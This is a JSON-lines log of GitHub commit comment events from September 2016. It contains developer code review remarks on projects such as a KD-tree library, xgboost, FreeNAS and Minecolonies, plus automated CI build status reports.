{"id":"4567853952","type":"CommitCommentEvent","actor":{"login":"snosov1"},"repo":{"name":"IvanKamynin/KDTree"},"payload":{"comment":{"id":19035508,"position":35,"line":35,"path":"KD3DTree/struct_kd_tree.h","commit_id":"8b6f48a3351a39676ee7a02e43fba59d3a6adeaa","created_at":"2016-09-15T12:44:53Z","updated_at":"2016-09-15T12:44:53Z","body":"The function doesn't make no sense to me. It **increments the counter**, despite it says \"get\" in its name; gives you an element (why not to access it directly?); in case of reaching max size, it **destroys the last element** (it doesn't do this at any other time and any other element). "}},"created_at":"2016-09-15T12:44:53Z"}
{"id":"4567854367","type":"CommitCommentEvent","actor":{"login":"petro-rudenko"},"repo":{"name":"dmlc/xgboost"},"payload":{"comment":{"id":19035510,"position":112,"line":221,"path":"jvm-packages/xgboost4j-spark/src/main/scala/ml/dmlc/xgboost4j/scala/spark/XGBoostModel.scala","commit_id":"fb02797e2ac3ea41f52facb3469926575c4d63cb","created_at":"2016-09-15T12:44:58Z","updated_at":"2016-09-15T12:44:58Z","body":"It's better to put responsibility to a user to manage cache. Since it could be used in pipeline - would be difficult to unpersist after this cache. Also to be able to control preferred StorageLevel for persistance."}},"created_at":"2016-09-15T12:44:58Z"}
{"id":"4567855041","type":"CommitCommentEvent","actor":{"login":"tganil"},"repo":{"name":"tganil/Anil_jenkins"},"payload":{"comment":{"id":19035511,"position":null,"line":null,"path":null,"commit_id":"fe402654872105a5fb3b43aeddfb7decd6fda074","created_at":"2016-09-15T12:45:09Z","updated_at":"2016-09-15T12:45:09Z","body":"nil"}},"created_at":"2016-09-15T12:45:09Z"}
{"id":"4567859147","type":"CommitCommentEvent","actor":{"login":"pipping"},"repo":{"name":"jcbeaudoin/MKCL"},"payload":{"comment":{"id":19035520,"position":33,"line":33,"path":"src/git_describe_this_mkcl.sh","commit_id":"fc50d0038f2f1579fbb7c6ae930c1d111448346e","created_at":"2016-09-15T12:45:58Z","updated_at":"2016-09-15T12:45:58Z","body":"Then this is not the right place for nit-picking. Please ignore my previous comments on the git code."}},"created_at":"2016-09-15T12:45:58Z"}
{"id":"4567860024","type":"CommitCommentEvent","actor":{"login":"snosov1"},"repo":{"name":"IvanKamynin/KDTree"},"payload":{"comment":{"id":19035521,"position":179,"line":179,"path":"KD3DTree/struct_kd_tree.h","commit_id":"8b6f48a3351a39676ee7a02e43fba59d3a6adeaa","created_at":"2016-09-15T12:46:11Z","updated_at":"2016-09-15T12:46:11Z","body":"#else?"}},"created_at":"2016-09-15T12:46:11Z"}
{"id":"4567863968","type":"CommitCommentEvent","actor":{"login":"ribeiroevandro"},"repo":{"name":"ribeiroevandro/ribeiroevandro.github.io"},"payload":{"comment":{"id":19035531,"position":null,"line":null,"path":null,"commit_id":"61a3c7280bee80a1c4f41262bf30d17b565d305c","created_at":"2016-09-15T12:46:59Z","updated_at":"2016-09-15T12:46:59Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;lEBHjvWv&#x2F;1-tete\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> tete\\</a>"}},"created_at":"2016-09-15T12:46:59Z"}
{"id":"4567865131","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19035537,"position":null,"line":null,"path":null,"commit_id":"53b8d5a28a0e63c1c0cf23a924bc96a0e577a0d0","created_at":"2016-09-15T12:47:13Z","updated_at":"2016-09-15T12:47:13Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (RKStrand) - x86_64-MacOS-10.9-clang: OK (2329 of 2330 tests passed, 0 test warnings)\n\n * 1 test had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTD diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: RDD diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-53b8d5a28a0e63c1c0cf23a924bc96a0e577a0d0-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-53b8d5a28a0e63c1c0cf23a924bc96a0e577a0d0-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-15T12:47:13Z"}
{"id":"4567866024","type":"CommitCommentEvent","actor":{"login":"SubDragonzj"},"repo":{"name":"CyanogenMod/android_device_oneplus_oneplus3"},"payload":{"comment":{"id":19035539,"position":null,"line":null,"path":null,"commit_id":"acab5c6062b06453f591f24b7ef1e8b609e4b3a8","created_at":"2016-09-15T12:47:23Z","updated_at":"2016-09-15T12:47:23Z","body":"0.0"}},"created_at":"2016-09-15T12:47:23Z"}
{"id":"4567868638","type":"CommitCommentEvent","actor":{"login":"dstepanenko"},"repo":{"name":"ikalnitsky/Kostyor"},"payload":{"comment":{"id":19035547,"position":15,"line":15,"path":"contrib/openapi.yml","commit_id":"6a62e365d76100d1d041e06196d815f0702e2327","created_at":"2016-09-15T12:47:54Z","updated_at":"2016-09-15T12:47:54Z","body":"Actually in Kostyor we used strategy \"documentation first\", but probably it doesn't really matter since both docs and code base aren't very big."}},"created_at":"2016-09-15T12:47:54Z"}
{"id":"4567876920","type":"CommitCommentEvent","actor":{"login":"stijnvanhoey"},"repo":{"name":"inbo/natuurindicatoren"},"payload":{"comment":{"id":19035569,"position":null,"line":null,"path":null,"commit_id":"e03e6bf09a7641cf7e35ba645934e97c0bc43421","created_at":"2016-09-15T12:49:33Z","updated_at":"2016-09-15T12:49:33Z","body":"@peterdesmet , this option is a rather dirty hack of the Rmd handling, however it work fine. \r\n\r\nOther options that could be tested/evaluated:\r\n* visualisation on github-pages for revision\r\n* keeping a plain `.md` file synchronised for the editing, while the `Rmd` is automatically updated (git hook) to keep track with the `.md` file (dixit @ThierryO )\r\n* check the possibilities of `bookdown` to make review and editing possible\r\n* leaving the strict path from Rmd and working with a custom 'templating' itself. This would e.g. mean a .md with the link to the figures and a separate R-stream with all the functions to render the figures."}},"created_at":"2016-09-15T12:49:33Z"}
{"id":"4567879447","type":"CommitCommentEvent","actor":{"login":"Zir4onah"},"repo":{"name":"Zir4onah/oop"},"payload":{"comment":{"id":19035574,"position":1,"line":1,"path":"git/hot.php","commit_id":"63d27f026a6b7aefa5c454334772ccb735eab358","created_at":"2016-09-15T12:50:05Z","updated_at":"2016-09-15T12:50:05Z","body":"sdasd"}},"created_at":"2016-09-15T12:50:05Z"}
{"id":"4567879594","type":"CommitCommentEvent","actor":{"login":"surajrav"},"repo":{"name":"freenas/freenas"},"payload":{"comment":{"id":19035575,"position":20,"line":61,"path":"src/freenas/usr/local/bin/freenas-snmp/zfs-snmp","commit_id":"154f9156a678fc1b0c29046b3afbbdb322d379a1","created_at":"2016-09-15T12:50:08Z","updated_at":"2016-09-15T12:50:08Z","body":"For some reason, my server side code is not sending a '' at the end of the message (yet to be investigated). \r\nI do not want it to block for very long since that blocks/timeout the SNMP get request, hence the timeout\r\nTill then select just came off the top of my head (since I had recently used it somewhere else). If there is a better way to get the same result, I am up for it "}},"created_at":"2016-09-15T12:50:08Z"}
{"id":"4567879713","type":"CommitCommentEvent","actor":{"login":"ytest1"},"repo":{"name":"yaegor/sandbox"},"payload":{"comment":{"id":19035576,"position":null,"line":null,"path":null,"commit_id":"1599bc22511ac35159b9745be148de1e820a865b","created_at":"2016-09-15T12:50:10Z","updated_at":"2016-09-15T12:50:10Z","body":"TeamCity Branches Tests :: Git yaegor sandbox [Build 33](http://munit-050:8112/tc/viewLog.html?buildId=99049&buildTypeId=BranchesTests_GitYaegorSandbox) outcome was **SUCCESS**\nSummary: Running Build time: 0:10:1"}},"created_at":"2016-09-15T12:50:10Z"}
{"id":"4567879978","type":"CommitCommentEvent","actor":{"login":"ytest1"},"repo":{"name":"yaegor/sandbox"},"payload":{"comment":{"id":19035578,"position":null,"line":null,"path":null,"commit_id":"19cab8e01032e3a493ce190300287ee37e88ce00","created_at":"2016-09-15T12:50:13Z","updated_at":"2016-09-15T12:50:13Z","body":"TeamCity Branches Tests :: Git yaegor sandbox [Build 34](http://munit-050:8112/tc/viewLog.html?buildId=99050&buildTypeId=BranchesTests_GitYaegorSandbox) is now running\n"}},"created_at":"2016-09-15T12:50:13Z"}
{"id":"4567880296","type":"CommitCommentEvent","actor":{"login":"snosov1"},"repo":{"name":"IvanKamynin/KDTree"},"payload":{"comment":{"id":19035580,"position":314,"line":314,"path":"KD3DTree/struct_kd_tree.h","commit_id":"8b6f48a3351a39676ee7a02e43fba59d3a6adeaa","created_at":"2016-09-15T12:50:16Z","updated_at":"2016-09-15T12:50:16Z","body":"`nLeafs` is `inout` parameter, which is not a good idea most of the time"}},"created_at":"2016-09-15T12:50:16Z"}
{"id":"4567883196","type":"CommitCommentEvent","actor":{"login":"snosov1"},"repo":{"name":"IvanKamynin/KDTree"},"payload":{"comment":{"id":19035588,"position":269,"line":269,"path":"KD3DTree/struct_kd_tree.h","commit_id":"8b6f48a3351a39676ee7a02e43fba59d3a6adeaa","created_at":"2016-09-15T12:50:50Z","updated_at":"2016-09-15T12:50:50Z","body":"`std::accumulate`"}},"created_at":"2016-09-15T12:50:50Z"}
{"id":"4567884466","type":"CommitCommentEvent","actor":{"login":"snosov1"},"repo":{"name":"IvanKamynin/KDTree"},"payload":{"comment":{"id":19035591,"position":226,"line":226,"path":"KD3DTree/struct_kd_tree.h","commit_id":"8b6f48a3351a39676ee7a02e43fba59d3a6adeaa","created_at":"2016-09-15T12:51:06Z","updated_at":"2016-09-15T12:51:06Z","body":"`std::iota`"}},"created_at":"2016-09-15T12:51:06Z"}
{"id":"4567890898","type":"CommitCommentEvent","actor":{"login":"Raycoms"},"repo":{"name":"Minecolonies/minecolonies"},"payload":{"comment":{"id":19035616,"position":4,"line":79,"path":"src/main/java/com/blockout/controls/Button.java","commit_id":"02ce894b8f6f25ebac9abfbcc20f656c4c8db56e","created_at":"2016-09-15T12:52:27Z","updated_at":"2016-09-15T12:52:27Z","body":"It didn't xD"}},"created_at":"2016-09-15T12:52:27Z"}
{"id":"4567893079","type":"CommitCommentEvent","actor":{"login":"Raycoms"},"repo":{"name":"Minecolonies/minecolonies"},"payload":{"comment":{"id":19035620,"position":45,"line":529,"path":"src/main/java/com/minecolonies/entity/EntityCitizen.java","commit_id":"02ce894b8f6f25ebac9abfbcc20f656c4c8db56e","created_at":"2016-09-15T12:52:55Z","updated_at":"2016-09-15T12:52:55Z","body":"Sonar told me that it will never return null."}},"created_at":"2016-09-15T12:52:55Z"}
{"id":"4567893439","type":"CommitCommentEvent","actor":{"login":"f403"},"repo":{"name":"getpelican/pelican"},"payload":{"comment":{"id":19035621,"position":null,"line":null,"path":null,"commit_id":"ec5c77b25145f7c20fee24c6b85b478295dbc956","created_at":"2016-09-15T12:53:00Z","updated_at":"2016-09-15T12:53:00Z","body":"Now you have to fix almost all [pelican-themes](https://github.com/getpelican/pelican-themes).\r\nMost of them use `PAGES`"}},"created_at":"2016-09-15T12:53:00Z"}
{"id":"4567900020","type":"CommitCommentEvent","actor":{"login":"snosov1"},"repo":{"name":"IvanKamynin/KDTree"},"payload":{"comment":{"id":19035644,"position":530,"line":530,"path":"KD3DTree/struct_kd_tree.h","commit_id":"8b6f48a3351a39676ee7a02e43fba59d3a6adeaa","created_at":"2016-09-15T12:54:25Z","updated_at":"2016-09-15T12:54:25Z","body":"I'm having hard time seeing how this is supposed to be a \"fast\" version, if it does so many allocations"}},"created_at":"2016-09-15T12:54:25Z"}
{"id":"4567901841","type":"CommitCommentEvent","actor":{"login":"akavel"},"repo":{"name":"sebcat/move-literals"},"payload":{"comment":{"id":19035649,"position":27,"line":44,"path":"move-literals.lua","commit_id":"cca5e3b78a36d85848165fa1644af03bc05b74f1","created_at":"2016-09-15T12:54:48Z","updated_at":"2016-09-15T12:54:48Z","body":"a `1` is \"anything\"?"}},"created_at":"2016-09-15T12:54:48Z"}
{"id":"4567902187","type":"CommitCommentEvent","actor":{"login":"akavel"},"repo":{"name":"sebcat/move-literals"},"payload":{"comment":{"id":19035653,"position":29,"line":46,"path":"move-literals.lua","commit_id":"cca5e3b78a36d85848165fa1644af03bc05b74f1","created_at":"2016-09-15T12:54:52Z","updated_at":"2016-09-15T12:54:52Z","body":"s/count/cont"}},"created_at":"2016-09-15T12:54:52Z"}
{"id":"4567902837","type":"CommitCommentEvent","actor":{"login":"akavel"},"repo":{"name":"sebcat/move-literals"},"payload":{"comment":{"id":19035655,"position":31,"line":48,"path":"move-literals.lua","commit_id":"cca5e3b78a36d85848165fa1644af03bc05b74f1","created_at":"2016-09-15T12:54:59Z","updated_at":"2016-09-15T12:54:59Z","body":"then, result of \"cap\" is captured by Cs, or what was matched? (the \"capture substitution\" explanation is not 100% clear to me)"}},"created_at":"2016-09-15T12:54:59Z"}
{"id":"4567903118","type":"CommitCommentEvent","actor":{"login":"akavel"},"repo":{"name":"sebcat/move-literals"},"payload":{"comment":{"id":19035656,"position":38,"line":55,"path":"move-literals.lua","commit_id":"cca5e3b78a36d85848165fa1644af03bc05b74f1","created_at":"2016-09-15T12:55:02Z","updated_at":"2016-09-15T12:55:02Z","body":"`-1` is EOF?"}},"created_at":"2016-09-15T12:55:02Z"}
{"id":"4567903487","type":"CommitCommentEvent","actor":{"login":"akavel"},"repo":{"name":"sebcat/move-literals"},"payload":{"comment":{"id":19035658,"position":52,"line":69,"path":"move-literals.lua","commit_id":"cca5e3b78a36d85848165fa1644af03bc05b74f1","created_at":"2016-09-15T12:55:08Z","updated_at":"2016-09-15T12:55:08Z","body":"additional space before first `*` ?"}},"created_at":"2016-09-15T12:55:08Z"}
{"id":"4567903921","type":"CommitCommentEvent","actor":{"login":"dallaswinger"},"repo":{"name":"aopp/android_packages_apps_Settings"},"payload":{"comment":{"id":19035659,"position":null,"line":null,"path":null,"commit_id":"14a0b521db6df88a2886fc325388431a646140cd","created_at":"2016-09-15T12:55:13Z","updated_at":"2016-09-15T12:55:13Z","body":"Also removes last_log to detect if we've successfully rebooted into recovery. Powermanager to reboot now instead of shelling out "}},"created_at":"2016-09-15T12:55:13Z"}
{"id":"4567907820","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19035671,"position":null,"line":null,"path":null,"commit_id":"53b8d5a28a0e63c1c0cf23a924bc96a0e577a0d0","created_at":"2016-09-15T12:55:56Z","updated_at":"2016-09-15T12:55:56Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1190 of 1190 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-53b8d5a28a0e63c1c0cf23a924bc96a0e577a0d0-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-53b8d5a28a0e63c1c0cf23a924bc96a0e577a0d0-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-53b8d5a28a0e63c1c0cf23a924bc96a0e577a0d0-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.1%25-green.svg)</a>\n"}},"created_at":"2016-09-15T12:55:56Z"}
{"id":"4567909246","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19035680,"position":null,"line":null,"path":null,"commit_id":"ee719dbb55f5d6216b3f4b6a73b1d9bbfd50ea03","created_at":"2016-09-15T12:56:15Z","updated_at":"2016-09-15T12:56:15Z","body":"See discussion [here](https://github.com/mcostalba/Stockfish/commit/ad7d2bdeedd2b0021e459297f3ddeaf6f8e07d87)"}},"created_at":"2016-09-15T12:56:15Z"}
{"id":"4567909714","type":"CommitCommentEvent","actor":{"login":"jceel"},"repo":{"name":"freenas/freenas"},"payload":{"comment":{"id":19035681,"position":20,"line":61,"path":"src/freenas/usr/local/bin/freenas-snmp/zfs-snmp","commit_id":"154f9156a678fc1b0c29046b3afbbdb322d379a1","created_at":"2016-09-15T12:56:19Z","updated_at":"2016-09-15T12:56:19Z","body":"Receiving '' means that the other side closed the connection (called shutdown on write end at the very least). 100msec timeout on single read might be too low, especially under load (what does the sending side do?). I asked about the timeout, because previous version didn't use it."}},"created_at":"2016-09-15T12:56:19Z"}
{"id":"4567913059","type":"CommitCommentEvent","actor":{"login":"jceel"},"repo":{"name":"freenas/freenas"},"payload":{"comment":{"id":19035692,"position":13,"line":58,"path":"src/freenas/usr/local/bin/freenas-snmp/zfs-snmp","commit_id":"154f9156a678fc1b0c29046b3afbbdb322d379a1","created_at":"2016-09-15T12:56:59Z","updated_at":"2016-09-15T12:56:59Z","body":"send() might potentially result in a short write, you probably want sendall() instead."}},"created_at":"2016-09-15T12:56:59Z"}
{"id":"4567914226","type":"CommitCommentEvent","actor":{"login":"Doublevil"},"repo":{"name":"Doublevil/Houhou-SRS"},"payload":{"comment":{"id":19035703,"position":null,"line":null,"path":null,"commit_id":"22c2315fada5d33ce539e80ba4cd6aee501736f8","created_at":"2016-09-15T12:57:15Z","updated_at":"2016-09-15T12:57:15Z","body":"Eeeh :o\r\nShowNanori is disabled by default I believe so maybe this is why nobody noticed.\r\nThanks!"}},"created_at":"2016-09-15T12:57:15Z"}
{"id":"4567914991","type":"CommitCommentEvent","actor":{"login":"shavenking"},"repo":{"name":"shavenking/symfony-playaround"},"payload":{"comment":{"id":19035704,"position":27,"line":118,"path":"message_board_symfony/src/AppBundle/Entity/Transfer.php","commit_id":"9e1b0b4633e7dbd7b44bc0827942f0f4199acb5f","created_at":"2016-09-15T12:57:23Z","updated_at":"2016-09-15T12:57:23Z","body":"#2 測試 Code Review"}},"created_at":"2016-09-15T12:57:23Z"}
{"id":"4567915141","type":"CommitCommentEvent","actor":{"login":"snosov1"},"repo":{"name":"IvanKamynin/KDTree"},"payload":{"comment":{"id":19035705,"position":122,"line":122,"path":"KD3DTree/struct_node_splitter.h","commit_id":"8b6f48a3351a39676ee7a02e43fba59d3a6adeaa","created_at":"2016-09-15T12:57:25Z","updated_at":"2016-09-15T12:57:25Z","body":"`for... 1,2,3`?"}},"created_at":"2016-09-15T12:57:25Z"}
{"id":"4567915737","type":"CommitCommentEvent","actor":{"login":"scottkurz"},"repo":{"name":"jvfullam/standards.jsr352.tck"},"payload":{"comment":{"id":19035706,"position":15,"line":612,"path":"com.ibm.jbatch.tck/src/main/java/com/ibm/jbatch/tck/tests/jslxml/ParallelExecutionTests.java","commit_id":"2f4235ed24ab25704be96885dc962e7ca7efecba","created_at":"2016-09-15T12:57:31Z","updated_at":"2016-09-15T12:57:31Z","body":"Good start.    Next step is to add a restart and some verification of the individual partition PUD values.   Since these aren't accessible via JobOperator you probably want to add an Analyzer to collect and do verification.  Another useful touch would be to add a PUD at the top-level in the Analyzer to verify it too is distinct from all the others."}},"created_at":"2016-09-15T12:57:31Z"}
{"id":"4567916840","type":"CommitCommentEvent","actor":{"login":"shavenking"},"repo":{"name":"shavenking/symfony-playaround"},"payload":{"comment":{"id":19035712,"position":27,"line":118,"path":"message_board_symfony/src/AppBundle/Entity/Transfer.php","commit_id":"9e1b0b4633e7dbd7b44bc0827942f0f4199acb5f","created_at":"2016-09-15T12:57:44Z","updated_at":"2016-09-15T12:57:44Z","body":"測試巢狀回覆 #1 "}},"created_at":"2016-09-15T12:57:44Z"}
{"id":"4567916920","type":"CommitCommentEvent","actor":{"login":"jkiddo"},"repo":{"name":"jonathanbp/ccow.contextmanager"},"payload":{"comment":{"id":19035713,"position":null,"line":null,"path":null,"commit_id":"6ec124e59bee57b6152e4e2eaf458d2bc04854e4","created_at":"2016-09-15T12:57:45Z","updated_at":"2016-09-15T12:57:45Z","body":"Woo hooo! Release party for 0.0.28 ;)"}},"created_at":"2016-09-15T12:57:45Z"}
{"id":"4567918399","type":"CommitCommentEvent","actor":{"login":"Keader"},"repo":{"name":"Keader/PBL-Compiladores"},"payload":{"comment":{"id":19035716,"position":15,"line":73,"path":"src/Util/Jarvis.java","commit_id":"8bdbfb797a9835c437a9c7445f816c87e95ec4a0","created_at":"2016-09-15T12:58:02Z","updated_at":"2016-09-15T12:58:02Z","body":"Culpe tabs/spaces do Eclipse/Netbeans !"}},"created_at":"2016-09-15T12:58:02Z"}
{"id":"4567922685","type":"CommitCommentEvent","actor":{"login":"FloridaStream"},"repo":{"name":"yixia/FFmpeg-Android"},"payload":{"comment":{"id":19035731,"position":null,"line":null,"path":null,"commit_id":"df29cf3c26c39fa751d70e2d6389a5843c116f08","created_at":"2016-09-15T12:58:51Z","updated_at":"2016-09-15T12:58:51Z","body":"@neo00789 vitamio R.I.P."}},"created_at":"2016-09-15T12:58:51Z"}
{"id":"4567923503","type":"CommitCommentEvent","actor":{"login":"FrankFang"},"repo":{"name":"mycolorway/qing-tooltip"},"payload":{"comment":{"id":19035733,"position":36,"line":46,"path":"src/qing-tooltip.coffee","commit_id":"5f80f2eff6e8370d6f23123442cd3515d1984ba0","created_at":"2016-09-15T12:59:00Z","updated_at":"2016-09-15T12:59:00Z","body":"这一部分感觉可以优化，有什么建议么 @farthinker "}},"created_at":"2016-09-15T12:59:00Z"}
{"id":"4567926226","type":"CommitCommentEvent","actor":{"login":"FrankFang"},"repo":{"name":"mycolorway/qing-tooltip"},"payload":{"comment":{"id":19035743,"position":95,"line":87,"path":"src/qing-tooltip.coffee","commit_id":"5f80f2eff6e8370d6f23123442cd3515d1984ba0","created_at":"2016-09-15T12:59:33Z","updated_at":"2016-09-15T12:59:33Z","body":"必须先添加到页面里，再计算位置。"}},"created_at":"2016-09-15T12:59:33Z"}
{"id":"4567929216","type":"CommitCommentEvent","actor":{"login":"Anil-Raj"},"repo":{"name":"Anil-Raj/Anil-Raj.github.io"},"payload":{"comment":{"id":19035754,"position":null,"line":null,"path":null,"commit_id":"d0cc4b0ef76d420e8b02a6150fbb013408d0f371","created_at":"2016-09-15T13:00:11Z","updated_at":"2016-09-15T13:00:11Z","body":"added new webpage contents"}},"created_at":"2016-09-15T13:00:11Z"}
{"id":"4567929431","type":"CommitCommentEvent","actor":{"login":"ytest1"},"repo":{"name":"yaegor/sandbox"},"payload":{"comment":{"id":19035755,"position":null,"line":null,"path":null,"commit_id":"19cab8e01032e3a493ce190300287ee37e88ce00","created_at":"2016-09-15T13:00:14Z","updated_at":"2016-09-15T13:00:14Z","body":"TeamCity Branches Tests :: Git yaegor sandbox [Build 34](http://munit-050:8112/tc/viewLog.html?buildId=99050&buildTypeId=BranchesTests_GitYaegorSandbox) outcome was **SUCCESS**\nSummary: Running Build time: 0:10:1"}},"created_at":"2016-09-15T13:00:14Z"}
{"id":"4567930021","type":"CommitCommentEvent","actor":{"login":"ytest1"},"repo":{"name":"yaegor/sandbox"},"payload":{"comment":{"id":19035757,"position":null,"line":null,"path":null,"commit_id":"a8858981cb5b2a7903f0453a30acae23e8a5646c","created_at":"2016-09-15T13:00:21Z","updated_at":"2016-09-15T13:00:21Z","body":"TeamCity Branches Tests :: Git yaegor sandbox [Build 35](http://munit-050:8112/tc/viewLog.html?buildId=99052&buildTypeId=BranchesTests_GitYaegorSandbox) is now running\n"}},"created_at":"2016-09-15T13:00:21Z"}
{"id":"4567930639","type":"CommitCommentEvent","actor":{"login":"joseph-roque"},"repo":{"name":"Microsquad/gitpizza"},"payload":{"comment":{"id":19035759,"position":null,"line":null,"path":null,"commit_id":"2aa866e3609202bb754199cffded611162f74d11","created_at":"2016-09-15T13:00:28Z","updated_at":"2016-09-15T13:00:28Z","body":"I was considering sharing this repo and I wanted a link to it :P It's a solid demo! With some nice background noise"}},"created_at":"2016-09-15T13:00:28Z"}
{"id":"4567931140","type":"CommitCommentEvent","actor":{"login":"sttts"},"repo":{"name":"kubernetes/kubernetes"},"payload":{"comment":{"id":19035760,"position":63,"line":63,"path":"pkg/kubectl/cmd/util/shortcut_restmapper.go","commit_id":"9fd91e82bf15f7912a8e7ced357f65a539b4bf25","created_at":"2016-09-15T13:00:30Z","updated_at":"2016-09-15T13:00:30Z","body":"cannot quite follow you code here? Why this complicated comparison of resource with `\"all\"` via a map?"}},"created_at":"2016-09-15T13:00:30Z"}
{"id":"4567930903","type":"CommitCommentEvent","actor":{"login":"FloridaStream"},"repo":{"name":"yixia/FFmpeg-Android"},"payload":{"comment":{"id":19035761,"position":null,"line":null,"path":null,"commit_id":"df29cf3c26c39fa751d70e2d6389a5843c116f08","created_at":"2016-09-15T13:00:31Z","updated_at":"2016-09-15T13:00:31Z","body":"THIS LIB dont work after compiled, i try and get error on init vitamio."}},"created_at":"2016-09-15T13:00:31Z"}
{"id":"4567931773","type":"CommitCommentEvent","actor":{"login":"TomasVotruba"},"repo":{"name":"doctrine/doctrine2"},"payload":{"comment":{"id":19035765,"position":null,"line":null,"path":null,"commit_id":"f06f383a385449093fa9342ac6ce2adcdebc357e","created_at":"2016-09-15T13:00:39Z","updated_at":"2016-09-15T13:00:39Z","body":"Awesome!"}},"created_at":"2016-09-15T13:00:39Z"}
{"id":"4567933099","type":"CommitCommentEvent","actor":{"login":"caphindsight"},"repo":{"name":"llama-0/sort"},"payload":{"comment":{"id":19035770,"position":3,"line":3,"path":"BubbleSort/Program.cs","commit_id":"b6abee91306d7deccba1646a02c80821254b16a6","created_at":"2016-09-15T13:00:53Z","updated_at":"2016-09-15T13:00:53Z","body":"На один отступ меньше"}},"created_at":"2016-09-15T13:00:53Z"}
{"id":"4567935851","type":"CommitCommentEvent","actor":{"login":"caphindsight"},"repo":{"name":"llama-0/sort"},"payload":{"comment":{"id":19035784,"position":27,"line":27,"path":"BubbleSort/Program.cs","commit_id":"b6abee91306d7deccba1646a02c80821254b16a6","created_at":"2016-09-15T13:01:26Z","updated_at":"2016-09-15T13:01:26Z","body":"Всё, что внутри функции - на один отступ больше."}},"created_at":"2016-09-15T13:01:26Z"}
{"id":"4567936325","type":"CommitCommentEvent","actor":{"login":"surajrav"},"repo":{"name":"freenas/freenas"},"payload":{"comment":{"id":19035786,"position":13,"line":58,"path":"src/freenas/usr/local/bin/freenas-snmp/zfs-snmp","commit_id":"154f9156a678fc1b0c29046b3afbbdb322d379a1","created_at":"2016-09-15T13:01:31Z","updated_at":"2016-09-15T13:01:31Z","body":"I have sendall on the other end (server) where the data is considerably bigger.\r\n\r\nWould a string like \"get_all\" or similar to it also fall prey to this short write? If so then I will change it"}},"created_at":"2016-09-15T13:01:31Z"}
{"id":"4567937038","type":"CommitCommentEvent","actor":{"login":"surajrav"},"repo":{"name":"freenas/freenas"},"payload":{"comment":{"id":19035787,"position":20,"line":61,"path":"src/freenas/usr/local/bin/freenas-snmp/zfs-snmp","commit_id":"154f9156a678fc1b0c29046b3afbbdb322d379a1","created_at":"2016-09-15T13:01:39Z","updated_at":"2016-09-15T13:01:39Z","body":"Sending side is just sending data collected periodically. The previous version I had nonblocking mode set on the socket which is why it was flaking sometimes.\r\n\r\nI do not like the `0.1` pseudo-empirical solution either but that will change when I refactor the server side code (which is impending sooner than later)"}},"created_at":"2016-09-15T13:01:39Z"}
{"id":"4567938003","type":"CommitCommentEvent","actor":{"login":"caphindsight"},"repo":{"name":"llama-0/sort"},"payload":{"comment":{"id":19035792,"position":37,"line":37,"path":"MergeSort/Program.cs","commit_id":"b6abee91306d7deccba1646a02c80821254b16a6","created_at":"2016-09-15T13:01:51Z","updated_at":"2016-09-15T13:01:51Z","body":"WAT"}},"created_at":"2016-09-15T13:01:51Z"}
{"id":"4567940704","type":"CommitCommentEvent","actor":{"login":"Kostronor"},"repo":{"name":"Minecolonies/minecolonies"},"payload":{"comment":{"id":19035800,"position":45,"line":529,"path":"src/main/java/com/minecolonies/entity/EntityCitizen.java","commit_id":"02ce894b8f6f25ebac9abfbcc20f656c4c8db56e","created_at":"2016-09-15T13:02:24Z","updated_at":"2016-09-15T13:02:24Z","body":"And its overrids? "}},"created_at":"2016-09-15T13:02:24Z"}
{"id":"4567945643","type":"CommitCommentEvent","actor":{"login":"jceel"},"repo":{"name":"freenas/freenas"},"payload":{"comment":{"id":19035818,"position":13,"line":58,"path":"src/freenas/usr/local/bin/freenas-snmp/zfs-snmp","commit_id":"154f9156a678fc1b0c29046b3afbbdb322d379a1","created_at":"2016-09-15T13:03:24Z","updated_at":"2016-09-15T13:03:24Z","body":"SOCK_STREAM doesn't guarantee atomic delivery, so short write is possible, though highly unlikely."}},"created_at":"2016-09-15T13:03:24Z"}
{"id":"4567952562","type":"CommitCommentEvent","actor":{"login":"sonora"},"repo":{"name":"osmandapp/Osmand"},"payload":{"comment":{"id":19035837,"position":null,"line":null,"path":null,"commit_id":"0e7b76cc6c880ab10e8bb17a1925a1b5e9e97f25","created_at":"2016-09-15T13:04:47Z","updated_at":"2016-09-15T13:04:47Z","body":"Thanks, Alexey!  ;)"}},"created_at":"2016-09-15T13:04:47Z"}
